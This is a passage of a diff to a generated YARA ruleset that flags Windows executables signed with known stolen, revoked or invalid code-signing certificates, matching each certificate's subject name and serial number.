-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xC3\\x89tienne Hill" and pe.signatures [ i ] . serial == "46:97:c7:dd:d3:e3:7f:e2:75:fd:c6:96:1a:90:93:e3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DNS KOMPLEKT" and pe.signatures [ i ] . serial == "e3:c7:cc:09:50:15:2e:9c:ee:ad:43:04:d0:1f:6c:89" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_74C94Ef697Dc9783F845D26Dccc1E7Fd : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6A241Ffe96A6349Df608D22C02942268 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3cd08af1-8999-59a8-a679-a39871ecf68e"
+		id = "571f5f11-576a-511b-975d-0643ae834502"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6787-L6799"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1491-L1502"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "226dfe366c31e9cb38910df7d6cb2037c545745594fd133d7b7359175f153a90"
+		logic_hash = "41db1a9b11e2d5b8de5ba81496d0e76ea5eddacc01c77bc28c7e05496842df04"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6daa64d7af228de45ded86ad4d1aeaa360295f56"
-		hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6"
+		thumbprint = "f97f4b9953124091a5053712b2c22b845b587cb2655156dcafed202fa7ceeeb1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CIBIKART d.o.o." and pe.signatures [ i ] . serial == "74:c9:4e:f6:97:dc:97:83:f8:45:d2:6d:cc:c1:e7:fd" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HELP, d.o.o." and pe.signatures [ i ] . serial == "6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5Dd1Cb148A90123Dcc13498B54E5A798 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00C04F5D17Af872Cb2C37E3367Fe761D0D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8bdc91bc-5a59-5c22-8d39-fe1bf4267813"
+		id = "9d008f04-8d02-5c6b-b38d-234409cce277"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6801-L6812"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1504-L1518"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b5ec1b9d3fd15259d3628b5199b274f85674b404c57329d8af4f779ae357454"
+		logic_hash = "7fa0d16600ae89e41d7b2b0655b142ea36202e8bbbf5f8e25cbb45a005995e79"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3a7c692345b67c7a2b21a6d94518588c8bbe514c"
+		thumbprint = "7f52ece50576fcc7d66e028ecec89d3faedeeedb953935e215aac4215c9f4d63"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "33adab6a2ixdac07i4cLb4ac05j6yG2ew95e" and pe.signatures [ i ] . serial == "5d:d1:cb:14:8a:90:12:3d:cc:13:49:8b:54:e5:a7:98" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DES SP Z O O" and ( pe.signatures [ i ] . serial == "00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures [ i ] . serial == "c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00A758504E7971869D0Aec2775Fffa03D5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1ecfe521-0148-5a13-b23f-dd1b14b835ed"
+		id = "e6bd4476-d287-54d9-82b3-d80f328d7831"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6814-L6829"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1520-L1531"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "08f52e96d1e93e2d406753fd0dee5d03501ac037ab022b710362b113eaae6239"
+		logic_hash = "0c804e7f1e43a98b150a97adcbba882f7764000abdf7c7408e3361aefa9298b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "646bbb3a37cc004bea6efcd48579d1a5776cb157"
-		hash1 = "3194e2fb68c007cf2f6deaa1fb07b2cc68292ee87f37dff70ba142377e2ca1fa"
+		thumbprint = "f91d436c1c7084b83007f032ef48fecda382ff8b81320212adb81e462976ad5a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amcert LLC" and ( pe.signatures [ i ] . serial == "a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures [ i ] . serial == "00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cubic Information Systems, UAB" and pe.signatures [ i ] . serial == "5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00F13A4F94Bf233525 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1d048571-661e-5d7f-a255-f07b84069b20"
+		id = "f77ccdb6-77b6-5c47-bde6-2b1b449f9533"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6831-L6845"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1533-L1544"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29284d9ced0d5e6d587edc9727321cdc7bf5ce4ad8407d460afa7f1e6d1bcb90"
+		logic_hash = "fc8073ebb9847d642f15cc74859b643afe00b3c331f68c06f3ff62c037225201"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "974eb056bb7467d54aae25a908ce661dac59c786"
+		thumbprint = "59fe580974e2f813c2a00b4be01acd46c94fdea89a3049433cd5ba5a2d96666d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SocketOptionName" and ( pe.signatures [ i ] . serial == "f1:3a:4f:94:bf:23:35:25" or pe.signatures [ i ] . serial == "00:f1:3a:4f:94:bf:23:35:25" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOREC, OOO" and pe.signatures [ i ] . serial == "71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_119Acead668Bad57A48B4F42F294F8F0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B2E730B0526F36Faf7D093D48D6D9997 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d3f45ee1-134f-5b16-81f8-83405a5e3181"
+		id = "7c74d3aa-dc4f-51ed-9574-74e0539cd22b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6847-L6858"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1546-L1557"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bae9aed4f53059b2ec0de630f681bb157c148d9ad38be35dd8c1a74b19619077"
+		logic_hash = "16c50b7a2b7b55662d5cdb2261a6b352657b2689a9328916fcf63ddfbef5d08f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "11ff68da43f0931e22002f1461136c662e623366"
+		thumbprint = "10dd41eb9225b615e6e4f1dce6690bd2c8d055f07d4238db902f3263e62a04a9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PB03 TRANSPORT LTD." and pe.signatures [ i ] . serial == "11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bamboo Connect s.r.o." and pe.signatures [ i ] . serial == "00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_21144343720267Ba42F586105Ff279De : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2C90Eaf4De3Afc03Ba924C719435C2A3 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "54e4133f-4fb7-5f70-a4dc-77c6f8120d29"
+		id = "0b1ae208-bf81-55d0-b4e5-b1c1f7556387"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6860-L6871"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1559-L1570"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a1eacebed0966ad5d78eb7e38d8b854d183f21a19a53bbcb57503e4271b2cc84"
+		logic_hash = "792898b34ebe4dfc603b3f3b54777a86827a52fd3699a799e95c436317be77da"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c56f79b4cc3a0e0894cd1e54facdf2db9d8ca62a"
+		thumbprint = "6b916111ffbd6736afa569d7d940ada544daf3b18213a0da3025b20973a577dc"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Varta Blue Dynamic" and pe.signatures [ i ] . serial == "21:14:43:43:72:02:67:ba:42:f5:86:10:5f:f2:79:de" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AntiFIX s.r.o." and pe.signatures [ i ] . serial == "2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00A3Cb8E964244768969B837Ca9981De68 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a9d74cc6-0d89-5de9-8f13-966455e49b9c"
+		id = "9c91e39e-a120-537d-a24c-f0b8ffe9dd6e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6873-L6884"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1572-L1583"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d88c9ac03a4b3803b85c5ee30ad127aca43cbfc33d754bc42c15593f7294b1bc"
+		logic_hash = "90c695b0cffd4786471faca21b77161ae6e930540766c4f18796a7adea74b6f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5617114bc2a584532eba1dd9eb9d23108d1f9ea7"
+		thumbprint = "a3b0a1cd3998688f294838758688f96adee7d5aa98ec43709b8868d6914e96c1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "a3:cb:8e:96:42:44:76:89:69:b8:37:ca:99:81:de:68" or pe.signatures [ i ] . serial == "00:a3:cb:8e:96:42:44:76:89:69:b8:37:ca:99:81:de:68" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALM4U GmbH" and pe.signatures [ i ] . serial == "00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Bd96F0B87Edca41E777507015B3B2775 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E38259Cf24Cc702Ce441B683Ad578911 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5ef0b542-01de-53ee-9a52-0a05bccccd22"
+		id = "79e00e92-4ddb-5f87-8f60-78f326674c66"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6886-L6900"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1585-L1596"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9906821de34bf6a20bfe1a4be81563a22b110bde68fbe36b491955c23d2dcc6"
+		logic_hash = "53d135553b88484e2c40976a9eaa0eb3f4f34c40ce775c198dfd6552155d1859"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "abfa72d4a78a9e63f97c90bcccb8f46f3c14ac52"
+		thumbprint = "16304d4840d34a641f58fe7c94a7927e1ba4b3936638164525bedc5a406529f8"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ООО \"СМ\"" and ( pe.signatures [ i ] . serial == "bd:96:f0:b8:7e:dc:a4:1e:77:75:07:01:5b:3b:27:75" or pe.signatures [ i ] . serial == "00:bd:96:f0:b8:7e:dc:a4:1e:77:75:07:01:5b:3b:27:75" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Akhirah Technologies Inc." and pe.signatures [ i ] . serial == "00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E41537B8Dd65670D6Eb01954Becacf1E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4929Ab561C812Af93Ddb9758B545F546 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "80ac0d4e-5865-562a-a4a1-fa02b6859bdb"
+		id = "e57e442a-6fe3-5d09-bbc4-d290a7a80090"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6902-L6916"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1598-L1609"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "94b7feb2d1ed8a7004599ac2018746bf43529f7cf7c4776fbdf21282013935c8"
+		logic_hash = "a03f37840b24456a4a2ef8e7c456dc99396886682156e4e95f7547bf38d8dc4d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "150ff604efa1e4868ea47c5d48244e57fa4b9196"
+		thumbprint = "0946bf998f8a463a1c167637537f3eba35205b748efc444a2e7f935dc8dd6dc7"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marketing Concept s.r.o." and ( pe.signatures [ i ] . serial == "e4:15:37:b8:dd:65:67:0d:6e:b0:19:54:be:ca:cf:1e" or pe.signatures [ i ] . serial == "00:e4:15:37:b8:dd:65:67:0d:6e:b0:19:54:be:ca:cf:1e" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Everything Wow s.r.o." and pe.signatures [ i ] . serial == "49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_06808C5934Da036A1297A936D72E93D4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B649A966410F62999C939384Af553919 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c75ae0da-e8b9-581f-bfde-f23b3b3f9d22"
+		id = "6b88b712-6d25-5152-80bf-562bf82f336c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6918-L6929"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1611-L1622"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "45840d354dcea86c38effc86b3b6f92540f32eab78286d51ff7f472618accb8b"
+		logic_hash = "231b0aa0a1e7c72552d683cc4f93b39444f7c1ebb3bb719bee224aa62e9a28dd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "efb70718bc00393a01694f255a28e30e9d2142a4"
+		thumbprint = "a0c6cd25e1990c0d03b6ec1ad5a140f2c8014a8c2f1f4f227ee2597df91a8b6c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rhaon Entertainment Inc" and pe.signatures [ i ] . serial == "06:80:8c:59:34:da:03:6a:12:97:a9:36:d7:2e:93:d4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.A.T. SARL" and pe.signatures [ i ] . serial == "00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_97D50C7E3Ab45B9A441A37D870484C10 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_22367Dbefd0A325C3893Af52547B14Fa : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "54c391df-ea76-5944-aae6-63f44ec557e5"
+		id = "301f126d-1ff6-5512-a38b-ca1dd7d67765"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6931-L6942"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1624-L1635"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2f535f66a4aabffff48f167ffcabcb366398e358eaafa2b3d67ee4c7ad19eb66"
+		logic_hash = "7b717a86ba0a6c3c8ba59c7b7c97dae802c351340ad67a9baf3f526b084e995a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2e47ceb6593c9fdbd367da8b765090e48f630b33"
+		thumbprint = "b5cb5b256e47a30504392c37991e4efc4ce838fde4ad8df47456d30b417e6d5c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHENZHEN MINIWAN TECHNOLOGY CO. LTD." and pe.signatures [ i ] . serial == "97:d5:0c:7e:3a:b4:5b:9a:44:1a:37:d8:70:48:4c:10" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.lux Software LLC" and pe.signatures [ i ] . serial == "22:36:7d:be:fd:0a:32:5c:38:93:af:52:54:7b:14:fa" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0B2B192657B37632518B08A06E201381 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E04A344B397F752A45B128A594A3D6B5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "917d2d66-f4b4-59b1-aeed-3b10c337d4b8"
+		id = "85a7c3f7-a449-54ad-aac4-53f2a2c6c30e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6944-L6955"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1637-L1648"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "361005555e5d4b51c4538617c99fe668fca61ccc0c0847611e1423f69194999c"
+		logic_hash = "db3c854b68387aa5c6976783e6f79f99fe3389344b64d38c603d298128193e12"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ea017224c3b209abf53941cc4110e93af7ecc7b1"
+		thumbprint = "d73229f3b7c2025a5a56e6e189be8a9120f1b3b0d8a78b7f62eff5c8d2293330"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Atomic Protocol Systems" and pe.signatures [ i ] . serial == "0b:2b:19:26:57:b3:76:32:51:8b:08:a0:6e:20:13:81" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Highweb Ireland Operations Limited" and pe.signatures [ i ] . serial == "00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00945Aaac27E7D6D810C0A542Bedd562A4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00A7989F8Be0C82D35A19E7B3Dd4Be30E5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5698130c-0696-5474-8b86-b6ba290d2822"
+		id = "0bb81ddc-b63b-534b-852f-7b0a2feeef9e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6957-L6972"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1650-L1661"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "292657717cb42835324b6ff42d563bca47e042e82afef24b5d666b16979b8103"
+		logic_hash = "66d600d97b5aca1aa9a302671f06aef0d5c4ae9829d6cb16f191bd4c59462d2e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "de7794505df4aeb1253500617e812f462592e163"
-		hash1 = "df3dabd031184b67bab7043baaae17061c21939d725e751c0a6f6b7867d0cf34"
+		thumbprint = "3e93aadb509b542c065801f04cffb34956f84ee8c322d65c7ae8e23d27fe5fbf"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DYNAMX BUSINESS GROUP LTD." and ( pe.signatures [ i ] . serial == "94:5a:aa:c2:7e:7d:6d:81:0c:0a:54:2b:ed:d5:62:a4" or pe.signatures [ i ] . serial == "00:94:5a:aa:c2:7e:7d:6d:81:0c:0a:54:2b:ed:d5:62:a4" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Instamix Limited" and pe.signatures [ i ] . serial == "00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6D450Cc59Acdb4B7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_39F56251Df2088223Cc03494084E6081 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "845e3f48-5660-525e-bd18-5953c64322f1"
+		id = "4b5c27e0-0b3e-52e6-a867-1c2adadf3af3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6974-L6985"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1663-L1674"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8328159dce3586c26b777f92d7a87e0660520cf08d122505d34ed427bdd7ff6f"
+		logic_hash = "dc757f831b2537f12151f4f9e886ccf83bacfbcaea3ce12b2199f13ae00b199e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bd3ac678cabb6465854880dd06b7b6cd231def89"
+		thumbprint = "66f32cf78b8f685a2c6f5bf361c9b0f9a9678de11a8e7931e2205d0ef65af05c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CancellationTokenSource" and pe.signatures [ i ] . serial == "6d:45:0c:c5:9a:cd:b4:b7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Med Pty. Ltd." and pe.signatures [ i ] . serial == "39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_66390Fc17786D4A342F0Ee89996D6522 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_009Cfbb4C69008821Aaacecde97Ee149Ab : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "202e4270-9b49-5516-8188-a64bd528a9c4"
